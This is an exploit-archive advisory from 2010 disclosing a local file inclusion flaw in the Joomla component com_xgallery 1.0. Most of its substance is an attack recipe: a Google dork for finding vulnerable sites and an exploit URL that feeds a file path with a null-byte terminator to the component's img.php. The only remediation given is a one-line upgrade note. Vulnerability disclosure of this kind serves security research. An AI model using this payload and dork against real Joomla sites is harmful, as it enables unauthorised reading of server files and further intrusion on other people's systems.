Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability

2010-12-22
ID: 15205
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Author: KelvinX ([email protected])
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 21-2010
# Location: HCM City, Vietnam
   ------------------------
  # Application: com_xgallery
# Version: 1.0
# Vendor: http://www.optikool.com/documentation/xmovie-component
# Google Dorks: inurl:com_xgallery
  ------------------------
  Exploit: http://127.0.0.1/[path]/components/com_xgallery/helpers/img.php?file=[LFI]%00
  ------------------------
  # Solution: Upgrade to the most recent version
1-4-2 (www01)